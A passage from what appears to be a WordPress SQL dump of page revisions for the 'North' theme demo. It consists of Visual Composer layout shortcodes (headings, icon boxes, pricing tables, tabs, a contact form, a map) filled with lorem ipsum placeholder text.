0to%20using%20%E2%80%98Content%20here%2C%20content%20here%E2%80%99%2C%20making%20it%20look%20like%20readable%20English.%22%7D%5D\"][vc_row_inner][vc_column_inner width=\"1/2\"][vc_column_text css_animation=\"left-to-right\"]\n<h1>PARALLAX WITH DEGRADE</h1>\nContrary to popular belief, Lorem Ipsum is not simply random text. It has roots in a piece of classical Latin literature from 45 BC, making it over 2000 years old. Richard McClintock not simply. [list icon=\"caret-right\" color=\"dark\" background=\"yes\"] [li]There are many variations of passages.<span style=\"color: #ffffff;\">.</span>[/li] [li]Contrary to popular belief, Lorem Ipsum is not simply random text.[/li] [li]Finibus Bonorum et Malorum (The Extremes of Good and Evil) by Cicero.[/li] [li]Finibus Bonorum et Malorum (The Extremes of Good and Evil) by Cicero.<span style=\"color: #ffffff;\">.</span>[/li] [li]But I must explain to you how all this mistaken idea<span style=\"color: #ffffff;\">.</span>[/li] [/list] Sed ut perspiciatis unde omnis iste natus error sit voluptatem accusantium dolorem que laudantium, totam rem aperiam, eaque ipsa quae ab illo inventore veritatis et quasi architecto beatae vitae dicta sunt explicabo.\n\n[button label=\"Read More\" url=\"#facts\" color=\"black\" scroll=\"yes\"][/vc_column_text][/vc_column_inner][vc_column_inner width=\"1/2\"][vc_single_image image=\"601\" css_animation=\"right-to-left\" border_color=\"grey\" img_link_target=\"_self\" img_size=\"full\" alignment=\"right\"][/vc_column_inner][/vc_row_inner][/vc_column][/vc_row][vc_row el_id=\"facts\"][vc_column width=\"1/1\"][special_heading title=\"WHAT OUR FUN FACTORS\" color=\"dark\" animated=\"yes\" margin_bottom=\"0\"][vc_row_inner][vc_column_inner width=\"1/4\"][counter title=\"Days Worked\" number=\"640\"][/vc_column_inner][vc_column_inner width=\"1/4\"][counter title=\"Projects Finished\" number=\"1250\"][/vc_column_inner][vc_column_inner width=\"1/4\"][counter title=\"Coffee Cups\" number=\"2040\"][/vc_column_inner][vc_column_inner width=\"1/4\"][counter title=\"Pizza Ordered\" number=\"1620\"][/vc_column_inner][/vc_row_inner][/vc_column][/vc_row][vc_row css=\".vc_custom_1405492003813{border-top-width: 1px !important;padding-bottom: 10px !important;border-color: #eeeeee !important;border-style: solid !important;}\" el_id=\"works\" content_width=\"fullwidth\" video_autoplay=\"true\" video_controls=\"true\" video_mute=\"true\"][vc_column width=\"1/1\"][special_heading title=\"Our Portfolio\" color=\"dark\" animated=\"no\" margin_bottom=\"0\" subtitle=\"Contrary to popular belief, Lorem Ipsum is not simply random text. It has roots in piece of classical Latin literature from 45 BC, it a old.\"][portfolio_grid filter=\"yes\" style=\"default\" cols=\"5\" thumb_size=\"square\" paged_posts=\"no\" cats=\"branding,design,photography,video\" thumb_style=\"alt\" fullwidth=\"no\" thumb_space=\"no\"][/vc_column][/vc_row][vc_row el_id=\"team\"][vc_column width=\"1/1\"][special_heading title=\"Our Creative Team\" color=\"dark\" animated=\"no\" margin_bottom=\"0\" subtitle=\"Contrary to popular belief, Lorem Ipsum is not simply random text. It has roots in piece of classical.\"][team_carousel posts_nr=\"6\"][/vc_column][/vc_row][vc_row el_id=\"features\" css=\".vc_custom_1405099363182{background-image: url(http://veented.com/workshops/north/north2/wp-content/uploads/2014/07/i21.jpg?id=537) !important;}\" color_scheme=\"white\" darken=\"dark\" bg_overlay=\"dark\" content_width=\"container\" video_autoplay=\"true\" video_controls=\"true\" video_mute=\"true\" parallax=\"yes\"][vc_column width=\"1/1\"][special_heading title=\"Features With Mobile\" color=\"dark\" animated=\"yes\" subtitle=\"Contrary to popular belief, Lorem Ipsum is not simply random text. It has roots in piece of classical. There are many variations of passages of Lorem Ipsum available.\" margin_bottom=\"60\"][vc_row_inner][vc_column_inner width=\"1/3\" css=\".vc_custom_1406709770765{padding-top: 60px !important;}\"][icon_box title=\"Analystic\" text=\"There are many variations of passages of the Lorem Ipsum available, but the majority have suffered alteration in some form.\" link_title=\"More Info\" target=\"_self\" style=\"right\" icon=\"fa-camera-retro\" animated=\"yes\" animation_delay=\"200\"][icon_box title=\"Web Design\" text=\"There are many variations of passages of the Lorem Ipsum available, but the majority have suffered alteration in some form.\" link_title=\"More Info\" target=\"_self\" style=\"right\" icon=\"fa-cog\" animated=\"yes\" animation_delay=\"400\"][/vc_column_inner][vc_column_inner width=\"1/3\" css=\".vc_custom_1405423153057{padding-right: 0px !important;padding-left: 0px !important;}\"][vc_single_image image=\"606\" alignment=\"center\" border_color=\"grey\" img_link_target=\"_self\" img_size=\"full\" css=\".vc_custom_1405099308623{margin-bottom: -250px !important;}\"][/vc_column_inner][vc_column_inner width=\"1/3\" css=\".vc_custom_1406709776984{padding-top: 60px !important;}\"][icon_box title=\"Wordpress\" text=\"There are many variations of passages of the Lorem Ipsum available, but the majority have suffered alteration in some form.\" link_title=\"More Info\" target=\"_self\" style=\"left\" icon=\"fa-desktop\" animated=\"yes\" animation_delay=\"200\"][icon_box title=\"Graphic\" text=\"There are many variations of passages of the Lorem Ipsum available, but the majority have suffered alteration in some form.\" link_title=\"More Info\" target=\"_self\" style=\"left\" icon=\"fa-paper-plane-o\" animated=\"yes\" animation_delay=\"400\"][/vc_column_inner][/vc_row_inner][/vc_column][/vc_row][vc_row css=\".vc_custom_1406709787994{padding-top: 100px !important;padding-bottom: 100px !important;}\" content_width=\"container\" video_autoplay=\"true\" video_controls=\"true\" video_mute=\"true\"][vc_column width=\"1/1\"][/vc_column][/vc_row][vc_row css=\".vc_custom_1408506097407{padding-top: 0px !important;background-image: url(http://veented.com/workshops/north/north2/wp-content/uploads/2014/06/testimonials-1.jpg?id=924) !important;}\" bg_overlay=\"dots_dark\" content_width=\"container\" video_autoplay=\"true\" video_controls=\"true\" video_mute=\"true\" parallax=\"yes\" video=\"mSLAF_DjiDU\"][vc_column width=\"1/1\"][testimonials style=\"simple\" posts_nr=\"4\"][/vc_column][/vc_row][vc_row css=\".vc_custom_1404037588724{padding-bottom: 70px !important;}\"][vc_column width=\"1/1\"][special_heading title=\"What Clients Says\" color=\"dark\" animated=\"yes\" subtitle=\"Contrary to popular belief, Lorem Ipsum is not simply random text. It has roots in piece of classical.\" margin_bottom=\"0\"][testimonials style=\"expanded\" posts_nr=\"4\"][/vc_column][/vc_row][vc_row css=\".vc_custom_1404039027476{padding-top: 0px !important;padding-bottom: 0px !important;background-color: #3a3a3a !important;}\"][vc_column width=\"1/1\"][logos_carousel images=\"568,566,567,563,564,565\" onclick=\"custom_link\" custom_links=\"#,#,#,#,#\"][/vc_column][/vc_row][vc_row css=\".vc_custom_1403955268505{margin-bottom: -15px !important;padding-bottom: 0px !important;}\"][vc_column width=\"1/1\"][special_heading title=\"WHY DO YOU CHOOSE NORTH?\" color=\"dark\" animated=\"yes\" subtitle=\"Contrary to popular belief, Lorem Ipsum is not simply random text. It has roots in piece of classical.\" margin_bottom=\"0\"][/vc_column][/vc_row][vc_row css=\".vc_custom_1409759263341{padding-bottom: 80px !important;}\" content_width=\"container\" video_autoplay=\"true\" video_controls=\"true\" video_mute=\"true\" el_id=\"what-we\"][vc_column width=\"1/2\"][vc_tabs][vc_tab title=\"Design\" tab_id=\"1403954748-1-96f2de-a384b99d-fe26\"][vc_column_text]<a href=\"http://veented.com/workshops/north/north2/wp-content/uploads/2014/06/mini-phone.png\"><img class=\"size-full wp-image-926 alignleft\" src=\"http://veented.com/workshops/north/north2/wp-content/uploads/2014/06/mini-phone.png\" alt=\"mini-phone\" width=\"164\" height=\"116\" /></a>Contrary to popular belief, Lorem Ipsum is not simply random text. It has roots in a piece of classical Latin literature from 45 BC, making it over 2000 years old. Richard McClintock, a Latin professor at Hampden-Sydney College in Virginia, looked up one of the more obscure Latin words, consectetur, from a Lorem Ipsum passage, and going through the cites of the word in classical literature, discover the undoubtable source.[/vc_column_text][/vc_tab][vc_tab title=\"Company\" tab_id=\"1403954748-2-63f2de-a384b99d-fe26\"][vc_column_text]<a href=\"http://veented.com/workshops/north/north2/wp-content/uploads/2014/06/mini-phone1.png\"><img class=\"size-full wp-image-927 alignright\" src=\"http://veented.com/workshops/north/north2/wp-content/uploads/2014/06/mini-phone1.png\" alt=\"mini-phone1\" width=\"130\" height=\"165\" /></a>Contrary to popular belief, Lorem Ipsum is not simply random text. It has roots in a piece of classical Latin literature from 45 BC, making it over 2000 years old. Richard McClintock, a Latin professor at Hampden-Sydney College in Virginia, looked up one of the more obscure Latin words, consectetur, from a Lorem Ipsum passage, and going through the cites of the word in classical literature, discover the undoubtable source.[/vc_column_text][/vc_tab][vc_tab title=\"Support\" tab_id=\"1405423831831-2-6b99d-fe26\"][vc_column_text]Contrary to popular belief, Lorem Ipsum is not simply random text. It has roots in a piece of classical Latin literature from 45 BC, making it over 2000 years old. Richard McClintock, a Latin professor at Hampden-Sydney College in Virginia, looked up one of the more obscure Latin words, consectetur, from a Lorem Ipsum passage, and going through the cites of the word in classical literature, discover the undoubtable source.[/vc_column_text][/vc_tab][/vc_tabs][/vc_column][vc_column width=\"1/2\"][vc_accordion][vc_accordion_tab title=\"Awesome Design\"][vc_column_text]Anim pariatur cliche reprehenderit, enim eiusmod high life accusamus terry richardson ad squid. 3 wolf moon officia aute, non cupidatat skateboard dolor brunch. Food truck quinoa nesciunt laborum eiusmod.[/vc_column_text][/vc_accordion_tab][vc_accordion_tab title=\"Improved Documentation\"][vc_column_text]Anim pariatur cliche reprehenderit, enim eiusmod high life accusamus terry richardson ad squid. 3 wolf moon officia aute, non cupidatat skateboard dolor brunch. Food truck quinoa nesciunt laborum eiusmod.[/vc_column_text][/vc_accordion_tab][vc_accordion_tab title=\"Clean Coded\"][vc_column_text]Anim pariatur cliche reprehenderit, enim eiusmod high life accusamus terry richardson ad squid. 3 wolf moon officia aute, non cupidatat skateboard dolor brunch. Food truck quinoa nesciunt laborum eiusmod.[/vc_column_text][/vc_accordion_tab][/vc_accordion][/vc_column][/vc_row][vc_row css=\".vc_custom_1405099662664{background-image: url(http://veented.com/workshops/north/north2/wp-content/uploads/2014/07/i31.jpg?id=538) !important;}\" color_scheme=\"white\" darken=\"dark\" bg_overlay=\"dark\" fullwidth=\"yes\" parallax=\"yes\" content_width=\"fullwidth\" video_autoplay=\"true\" video_controls=\"true\" video_mute=\"true\"][vc_column width=\"1/1\"][special_heading title=\"Our Featured Works\" color=\"dark\" animated=\"yes\" subtitle=\"CONTRARY TO POPULAR BELIEF, LOREM IPSUM IS NOT SIMPLY RANDOM TEXT. IT HAS ROOTS IN PIECE OF CLASSICAL. THERE ARE MANY VARIATIONS OF PASSAGES OF LOREM IPSUM AVAILABLE.\"][portfolio_carousel cats=\"branding,design,photography,video\" posts_nr=\"6\" thumb_style=\"alt\"][cta heading=\"super responsive, clean and creative theme\" subtitle=\"This is Photoshop\'s version of Lorem Ipsum. Proin gravida nibh vel velit auctor aliquet. Aenean sollicitudin, lorem quis bibendum.\" button1_title=\"Our Portfolio\" button1_url=\"#works\" button2_title=\"Keep in Touch\" button2_url=\"#contact\" margin_bottom=\"0\" button1_subtitle=\"click for our all works\" button2_subtitle=\"send us a message\" style=\"centered\" button_color=\"white\"][/vc_column][/vc_row][vc_row css=\".vc_custom_1403956257324{background-position: center !important;background-repeat: no-repeat !important;background-size: cover !important;}\"][vc_column width=\"1/1\"][special_heading title=\"Our Skills\" color=\"dark\" animated=\"yes\" subtitle=\"Contrary to popular belief, Lorem Ipsum is not simply random text. It has roots in piece of classical.\" margin_bottom=\"60\"][vc_row_inner][vc_column_inner width=\"1/2\"][vc_progress_bar values=\"55|Design,85|Wordpress,75|HTML&amp;CSS\" bgcolor=\"bar_black\" units=\"%\"][/vc_column_inner][vc_column_inner width=\"1/2\"][vc_progress_bar values=\"70|Photography,75|Web Design,80|Photoshop\" bgcolor=\"bar_black\" units=\"%\"][/vc_column_inner][/vc_row_inner][/vc_column][/vc_row][vc_row css=\".vc_custom_1405099917341{background-image: url(http://veented.com/workshops/north/north2/wp-content/uploads/2014/07/i41.jpg?id=539) !important;background-position: center !important;background-repeat: no-repeat !important;background-size: cover !important;}\" darken=\"light\" bg_overlay=\"light\" el_id=\"services\" parallax=\"yes\" content_width=\"container\" video_autoplay=\"true\" video_controls=\"true\" video_mute=\"true\"][vc_column width=\"1/1\"][special_heading title=\"OUR SERVICES\" color=\"dark\" animated=\"yes\" subtitle=\"Contrary to popular belief, Lorem Ipsum is not simply random text. It has roots in piece of classical Latin old. Richard McClintock, a Latin professor at Hampden-Sydney College in Virginia.\"][services_carousel posts_nr=\"5\"][/vc_column][/vc_row][vc_row css=\".vc_custom_1405099958560{background-image: url(http://veented.com/workshops/north/north2/wp-content/uploads/2014/07/i51.jpg?id=540) !important;}\" darken=\"light\" bg_overlay=\"darker\" color_scheme=\"white\" el_id=\"prices\" parallax=\"yes\" content_width=\"container\" video_autoplay=\"true\" video_controls=\"true\" video_mute=\"true\"][vc_column width=\"1/1\"][special_heading title=\"Our Pricing Tables\" color=\"dark\" animated=\"yes\" subtitle=\"Contrary to popular belief, Lorem Ipsum is not simply random text. It has roots in piece of classical.\" margin_bottom=\"60\"][vc_row_inner][vc_column_inner width=\"1/4\"][pricing_box title=\"Starter\" price=\"$19\" period=\"per year\" featured=\"no\" button_label=\"Buy Now\" animated=\"yes\" animation_delay=\"100\" features=\"PREMIUM PROFILE LISTING,UNLIMITED FILE ACCESS,FREE APPOINTMENTS,5 BONUS POINTS EVERY MONTH,2 MONTHS SUPPORT,2 SUBDOMAINS\"][/vc_column_inner][vc_column_inner width=\"1/4\"][pricing_box title=\"Standard\" price=\"$39\" period=\"per year\" featured=\"no\" button_label=\"Buy Now\" animated=\"yes\" animation_delay=\"300\" features=\"PREMIUM PROFILE LISTING,UNLIMITED FILE ACCESS,FREE APPOINTMENTS,5 BONUS POINTS EVERY MONTH,2 MONTHS SUPPORT,2 SUBDOMAINS\"][/vc_column_inner][vc_column_inner width=\"1/4\"][pricing_box title=\"Professional\" price=\"$59\" period=\"per year\" featured=\"yes\" button_label=\"Buy Now\" animated=\"yes\" animation_delay=\"500\" features=\"PREMIUM PROFILE LISTING,UNLIMITED FILE ACCESS,FREE APPOINTMENTS,5 BONUS POINTS EVERY MONTH,2 MONTHS SUPPORT,2 SUBDOMAINS\"][/vc_column_inner][vc_column_inner width=\"1/4\"][pricing_box title=\"Platinum\" price=\"$79\" period=\"per year\" featured=\"no\" button_label=\"Buy Now\" animated=\"yes\" animation_delay=\"700\" features=\"PREMIUM PROFILE LISTING,UNLIMITED FILE ACCESS,FREE APPOINTMENTS,5 BONUS POINTS EVERY MONTH,2 MONTHS SUPPORT,2 SUBDOMAINS\"][/vc_column_inner][/vc_row_inner][/vc_column][/vc_row][vc_row css=\".vc_custom_1404125302141{padding-bottom: 70px !important;background-position: center !important;background-repeat: no-repeat !important;background-size: cover !important;}\" darken=\"light\" bg_overlay=\"light\"][vc_column width=\"1/1\"][special_heading title=\"Keep in Touch\" color=\"dark\" animated=\"yes\" subtitle=\"Contrary to popular belief, Lorem Ipsum is not simply random text. It has roots in piece of classical.\"][vntd_contact_form email=\"prafgon@gmail.com\" label_name=\"Please enter your Name\" label_email=\"Please enter your E-Mail\" label_subject=\"Please enter your Subject\" label_message=\"Please enter your Message\" label_submit=\"Send E-Mail\" id=\"417\" animated=\"no\"][/vc_column][/vc_row][vc_row css=\".vc_custom_1405424323297{background-image: url(http://veented.com/workshops/north/north2/wp-content/uploads/2014/07/i51.jpg?id=540) !important;}\" bg_overlay=\"darker\" el_id=\"contact\" content_width=\"container\" video_autoplay=\"true\" video_controls=\"true\" video_mute=\"true\" parallax=\"yes\"][vc_column width=\"1/1\"][contact_block phone=\"0123 456 789\" address=\"NORTH, STREET NAME 6209, MELBOURNE AUSTRALIA\" email=\"SUPPORT@GOLDEYESTHEME.COM\" facebook=\"#\" twitter=\"#\" linkedin=\"#\" youtube=\"#\"][/vc_column][/vc_row][vc_row css=\".vc_custom_1405425125857{padding-top: 0px !important;padding-bottom: 0px !important;}\" content_width=\"fullwidth\" video_autoplay=\"true\" video_controls=\"true\" video_mute=\"true\"][vc_column width=\"1/1\"][gmap lat=\"41.862274\" long=\"-87.701328\" height=\"400\" zoom=\"15\" marker1_title=\"Office 1\" marker1_text=\"Your description goes here.\" marker1_location=\"custom\" marker1_location_custom=\"41.863774,-87.721328\" marker2_title=\"Our other store\" marker2_text=\"My secondary marker description.\" marker2_location=\"41.858774,-87.685328\"][/vc_column][/vc_row]','Home3','','inherit','closed','closed','','629-revision-v1','','','2014-07-13 08:57:38','2014-07-13 08:57:38','',629,'http://highperformingstudent.com/2014/07/13/629-revision-v1/',0,'revision','',0),(638,1,'2014-07-15 07:36:28','2014-07-15 07:36:28','','Landing','','publish','open','open','','landing','','','2014-07-15 07:36:28','2014-07-15 07:36:28','',0,'http://veented.com/themes/north/?page_id=638',0,'page','',0),(691,1,'2014-07-15 12:08:06','2014-07-15 12:08:06','[vc_row css=\".vc_custom_1405098881992{padding-top: 0px !important;padding-bottom: 0px !important;}\" el_id=\"first\" fullwidth=\"yes\" row_width=\"fullwidth\" content_width=\"fullwidth\" video_autoplay=\"true\" video_controls=\"true\" video_mute=\"true\"][vc_column width=\"1/1\"][layerslider_vc id=\"1\"][/vc_column][/vc_row][vc_row css=\".vc_custom_1405422234264{padding-top: 0px !important;padding-bottom: 0px !important;background-color: #1f1f1f !important;}\" color_scheme=\"white\" content_width=\"container\" video_autoplay=\"true\" video_controls=\"true\" video_mute=\"true\"][vc_column width=\"1/1\"][cta button_title=\"Click me!\" button_url=\"http://\" button_color=\"dark\" button_color_custom=\"#5cbbf5\" text_align=\"left\" fullwidth=\"no\" subtitle=\"It is a long established fact that a reader will be distracted by the readable content of at its layout.\" button1_title=\"Purchase\" button1_url=\"#\" button2_title=\"Get Started\" button2_url=\"#about\" heading=\"Welcome to North!\" style=\"default\"]WELCOME TO NORTH![/cta][/vc_column][/vc_row][vc_row el_id=\"about\"][vc_column width=\"1/1\"][special_heading subtitle=\"Contrary to popular belief, Lorem Ipsum is not simply random text. It has roots in piece of classical Latin literature from 45 BC, it a old. Richard McClintock, looked up one of the more obscure\" text_align=\"center\" title=\"About North\" color=\"dark\" animated=\"yes\" margin_bottom=\"65\"]About North[/special_heading][vc_row_inner][vc_column_inner width=\"1/4\"][icon_box title=\"Professional Design\" text=\"There are many variations of passages of Lorem Ipsum available, but the joy have suffered alteration in some format, by injected humour.\" link_title=\"More Info\" target=\"_self\" text_style=\"fullwidth\" style=\"centered\" icon=\"fa-desktop\" animated=\"yes\" animation_delay=\"300\"][/vc_column_inner][vc_column_inner width=\"1/4\"][icon_box title=\"Retina Ready\" text=\"There are many variations of passages of Lorem Ipsum available, but the joy have suffered alteration in some format, by injected humour.\" link_title=\"More Info\" target=\"_self\" text_style=\"fullwidth\" style=\"centered\" icon=\"fa-comments-o\" animated=\"yes\" animation_delay=\"500\"][/vc_column_inner][vc_column_inner width=\"1/4\"][icon_box title=\"7x24 Support\" text=\"There are many variations of passages of Lorem Ipsum available, but the joy have suffered alteration in some format, by injected humour.\" link_title=\"More Info\" target=\"_self\" text_style=\"fullwidth\" style=\"centered\" icon=\"fa-life-ring\" animated=\"yes\" animation_delay=\"700\"][/vc_column_inner][vc_column_inner width=\"1/4\"][icon_box title=\"Clean Coding\" text=\"There are many variations of passages of Lorem Ipsum available, but the joy have suffered alteration in some format, by injected humour.\" link_title=\"More Info\" target=\"_self\" text_style=\"fullwidth\" style=\"centered\" icon=\"fa-flask\" animated=\"yes\" animation_delay=\"900\"][/vc_column_inner][/vc_row_inner][/vc_column][/vc_row][vc_row el_id=\"what-we-do\" css=\".vc_custom_1405099060231{background-image: url(http://highperformingstudent.com/wp-content/uploads/2014/07/i11.jpg?id=536) !important;}\" color_scheme=\"white\" darken=\"dark\" bg_overlay=\"dark\" parallax=\"yes\" content_width=\"container\" video_autoplay=\"true\" video_controls=\"true\" video_mute=\"true\"][vc_column width=\"1/1\"][special_heading subtitle=\"Contrary to popular belief, Lorem Ipsum is not simply random text. It has roots in piece of classical Latin literature from 45 BC, it a old. Richard McClintock, looked up one of the more obscure\" text_align=\"center\" title=\"What we do\" color=\"white\" animated=\"yes\" margin_bottom=\"0\"]About North[/special_heading][north_tabs tabs=\"%5B%7B%22title%22%3A%22Movie%22%2C%22heading%22%3A%22Movie%22%2C%22text%22%3A%22Contrary%20to%20popular%20belief%2C%20Lorem%20Ipsum%20is%20not%20simply%20random%20text.%20It%20has%20roots%20in%20a%20piece%20of%20classical%20Latin%20literature%20from%2045%20BC%2C%20making%20it%20over%202000%20years%20old.%20Rich%20McClintock%20not%20simply.%20There%20are%20many%20variations%20of%20passages%20of%20Lorem%20Ipsum%20available%2C%20but%20the%20majority%20have%20suffered%20alteration%20in%20some%20form.%22%7D%2C%7B%22title%22%3A%22Landing%22%2C%22heading%22%3A%22Landing%22%2C%22text%22%3A%22There%20are%20many%20variations%20of%20passages%20of%20Lorem%20Ipsum%20available%2C%20but%20the%20majority%20have%20suffered%20alteration%20in%20some%20form%2C%20by%20injected%20humour%2C%20or%20randomised%20words%20which%20don%E2%80%99t%20look%20even%20snormally%20believable.%20If%20you%20are%20going%20to%20use%20a%20passage%20of%20Lorem%20Ipsum%2C%20you%20need%20to%20be%20sure%20there%20isn%E2%80%99t%20anything%20embarrassing%20hidden%20in%20the%20middle%20of%20text.%20All%20the%20Lorem%20Ipsum%20generators%20on%20the%20Internet%20tend%20to%20repeat%20predefined%20chunks%20as%20necessary%2C%20making%20this%20the%20first%20true%20generator%20on%20the%20Internet.%20It%20uses%20a%20dictionary%20of%20over%20200%20Latin%20words%2C%20combined%20with%20a%20handful%20of%20model%20sentence%20structures%2C%20to%20generate%20Lorem%20Ipsum%20which%20looks%20reasonable.%20The%20generated%20Lorem%20Ipsum%20is%20therefore%20always%20free%20from%20repetition%2C%20injected%20humour%2C%20or%20non-characteristic%20words%20etc.%22%7D%2C%7B%22title%22%3A%22Design%22%2C%22heading%22%3A%22Design%22%2C%22text%22%3A%22It%20is%20a%20long%20established%20fact%20that%20a%20reader%20will%20be%20distracted%20by%20the%20readable%20content%20of%20a%20page%20when%20looking%20at%20its%20layout.%20The%20point%20of%20using%20Lorem%20Ipsum%20is%20that%20it%20has%20a%20more-or-less%20normal%20distribution%20of%20letters%2C%20as%20opposed%20to%20using%20%E2%80%98Content%20here%2C%20content%20here%E2%80%99%2C%20making%20it%20look%20like%20readable%20English.%22%7D%2C%7B%22title%22%3A%22Art%22%2C%22heading%22%3A%22Art%22%2C%22text%22%3A%22It%20is%20a%20long%20established%20fact%20that%20a%20reader%20will%20be%20distracted%20by%20the%20readable%20content%20of%20a%20page%20when%20looking%20at%20its%20layout.%20The%20point%20of%20using%20Lorem%20Ipsum%20is%20that%20it%20has%20a%20more-or-less%20normal%20distribution%20of%20letters%2C%20as%20opposed%20to%20using%20%E2%80%98Content%20here%2C%20content%20here%E2%80%99%2C%20making%20it%20look%20like%20readable%20English.%22%7D%5D\"][vc_row_inner][vc_column_inner width=\"1/2\"][vc_column_text css_animation=\"left-to-right\"]\n<h1>PARALLAX WITH DEGRADE</h1>\nContrary to popular belief, Lorem Ipsum is not simply random text. It has roots in a piece of classical Latin literature from 45 BC, making it over 2000 years old. Richard McClintock not simply.\n\n[list icon=\"caret-right\" color=\"dark\" background=\"yes\"]\n\n[li]There are many variations of passages.<span style=\"color: #ffffff;\">.</span>[/li]\n\n[li]Contrary to popular belief, Lorem Ipsum is not simply random text.[/li]\n\n[li]Finibus Bonorum et Malorum (The Extremes of Good and Evil) by Cicero.[/li]\n\n[li]Finibus Bonorum et Malorum (The Extremes of Good and Evil) by Cicero.<span style=\"color: #ffffff;\">.</span>[/li]\n\n[li]But I must explain to you how all this mistaken idea<span style=\"color: #ffffff;\">.</span>[/li]\n\n[/list]\n\nSed ut perspiciatis unde omnis iste natus error sit voluptatem accusantium dolorem que laudantium, totam rem aperiam, eaque ipsa quae ab illo inventore veritatis et quasi architecto beatae vitae dicta sunt explicabo.\n\n[button label=\"Read More\" url=\"#\" color=\"black\"][/vc_column_text][/vc_column_inner][vc_column_inner width=\"1/2\"][vc_single_image image=\"601\" css_animation=\"right-to-left\" border_color=\"grey\" img_link_target=\"_self\" img_size=\"full\" alignment=\"right\"][/vc_column_inner][/vc_row_inner][/vc_column][/vc_row][vc_row el_id=\"facts\"][vc_column width=\"1/1\"][special_heading title=\"WHAT OUR FUN FACTORS\" color=\"dark\" animated=\"yes\" margin_bottom=\"0\"][vc_row_inner][vc_column_inner width=\"1/4\"][counter title=\"Days Worked\" number=\"640\"][/vc_column_inner][vc_column_inner width=\"1/4\"][counter title=\"Projects Finished\" number=\"1250\"][/vc_column_inner][vc_column_inner width=\"1/4\"][counter title=\"Coffee Cups\" number=\"2040\"][/vc_column_inner][vc_column_inner width=\"1/4\"][counter title=\"Pizza Ordered\" number=\"1620\"][/vc_column_inner][/vc_row_inner][/vc_column][/vc_row][vc_row css=\".vc_custom_1406483381202{border-top-width: 1px !important;border-bottom-width: 1px !important;padding-bottom: 50px !important;background-color: #fdfdfd !important;border-color: #eeeeee !important;border-style: solid !important;}\" el_id=\"works\" content_width=\"container\" video_autoplay=\"true\" video_controls=\"true\" video_mute=\"true\"][vc_column width=\"1/1\"][special_heading title=\"Our Portfolio\" color=\"dark\" animated=\"no\" margin_bottom=\"0\" subtitle=\"Contrary to popular belief, Lorem Ipsum is not simply random text. It has roots in piece of classical Latin literature from 45 BC, it a old.\"][portfolio_grid filter=\"yes\" style=\"default\" cols=\"4\" thumb_size=\"square\" paged_posts=\"no\" cats=\"branding,design,photography,video\" thumb_style=\"alt\" more_url=\"http://veented.com/themes/north/portfolio/\" fullwidth=\"no\" thumb_space=\"yes\" posts_nr=\"9\"][/vc_column][/vc_row][vc_row el_id=\"team\"][vc_column width=\"1/1\"][special_heading title=\"Our Creative Team\" color=\"dark\" animated=\"no\" margin_bottom=\"0\" subtitle=\"Contrary to popular belief, Lorem Ipsum is not simply random text. It has roots in piece of classical.\"][team_carousel posts_nr=\"6\"][/vc_column][/vc_row][vc_row el_id=\"features\" css=\".vc_custom_1405099363182{background-image: url(http://highperformingstudent.com/wp-content/uploads/2014/07/i21.jpg?id=537) !important;}\" color_scheme=\"white\" darken=\"dark\" bg_overlay=\"dark\" content_width=\"container\" video_autoplay=\"true\" video_controls=\"true\" video_mute=\"true\" parallax=\"yes\"][vc_column width=\"1/1\"][special_heading title=\"Features With Mobile\" color=\"dark\" animated=\"yes\" subtitle=\"Contrary to popular belief, Lorem Ipsum is not simply random text. It has roots in piece of classical. There are many variations of passages of Lorem Ipsum available.\" margin_bottom=\"60\"][vc_row_inner][vc_column_inner width=\"1/3\" css=\".vc_custom_1406709712876{padding-top: 60px !important;}\"][icon_box title=\"Analystic\" text=\"There are many variations of passages of the Lorem Ipsum available, but the majority have suffered alteration in some form.\" link_title=\"More Info\" target=\"_self\" style=\"right\" icon=\"fa-camera-retro\" animated=\"yes\" animation_delay=\"200\"][icon_box title=\"Web Design\" text=\"There are many variations of passages of the Lorem Ipsum available, but the majority have suffered alteration in some form.\" link_title=\"More Info\" target=\"_self\" style=\"right\" icon=\"fa-cog\" animated=\"yes\" animation_delay=\"400\"][/vc_column_inner][vc_column_inner width=\"1/3\" css=\".vc_custom_1405423153057{padding-right: 0px !important;padding-left: 0px !important;}\"][vc_single_image image=\"606\" alignment=\"center\" border_color=\"grey\" img_link_target=\"_self\" img_size=\"full\" css=\".vc_custom_1405099308623{margin-bottom: -250px !important;}\"][/vc_column_inner][vc_column_inner width=\"1/3\" css=\".vc_custom_1406709718986{padding-top: 60px !important;}\"][icon_box title=\"Wordpress\" text=\"There are many variations of passages of the Lorem Ipsum available, but the majority have suffered alteration in some form.\" link_title=\"More Info\" target=\"_self\" style=\"left\" icon=\"fa-desktop\" animated=\"yes\" animation_delay=\"200\"][icon_box title=\"Graphic\" text=\"There are many variations of passages of the Lorem Ipsum available, but the majority have suffered alteration in some form.\" link_title=\"More Info\" target=\"_self\" style=\"left\" icon=\"fa-paper-plane-o\" animated=\"yes\" animation_delay=\"400\"][/vc_column_inner][/vc_row_inner][/vc_column][/vc_row][vc_row css=\".vc_custom_1406709728346{padding-top: 100px !important;padding-bottom: 100px !important;}\" content_width=\"container\" video_autoplay=\"true\" video_controls=\"true\" video_mute=\"true\"][vc_column width=\"1/1\"][/vc_column][/vc_row][vc_row css=\".vc_custom_1408506046218{padding-top: 0px !important;background-image: url(http://highperformingstudent.com/wp-content/uploads/2014/06/testimonials-1.jpg?id=924) !important;}\" bg_overlay=\"dark\" content_width=\"container\" video_autoplay=\"true\" video_controls=\"true\" video_mute=\"true\" parallax=\"yes\"][vc_column width=\"1/1\"][testimonials style=\"simple\" posts_nr=\"4\"][/vc_column][/vc_row][vc_row css=\".vc_custom_1404037588724{padding-bottom: 70px !important;}\"][vc_column width=\"1/1\"][special_heading title=\"What Clients Says\" color=\"dark\" animated=\"yes\" subtitle=\"Contrary to popular belief, Lorem Ipsum is not simply random text. It has roots in piece of classical.\" margin_bottom=\"0\"][testimonials style=\"expanded\" posts_nr=\"4\"][/vc_column][/vc_row][vc_row css=\".vc_custom_1404039027476{padding-top: 0px !important;padding-bottom: 0px !important;background-color: #3a3a3a !important;}\"][vc_column width=\"1/1\"][logos_carousel images=\"568,566,567,563,564,565\" onclick=\"custom_link\" custom_links=\"#,#,#,#,#\"][/vc_column][/vc_row][vc_row css=\".vc_custom_1403955268505{margin-bottom: -15px !important;padding-bottom: 0px !important;}\"][vc_column width=\"1/1\"][special_heading title=\"WHY DO YOU CHOOSE NORTH?\" color=\"dark\" animated=\"yes\" subtitle=\"Contrary to popular belief, Lorem Ipsum is not simply random text. It has roots in piece of classical.\" margin_bottom=\"0\"][/vc_column][/vc_row][vc_row 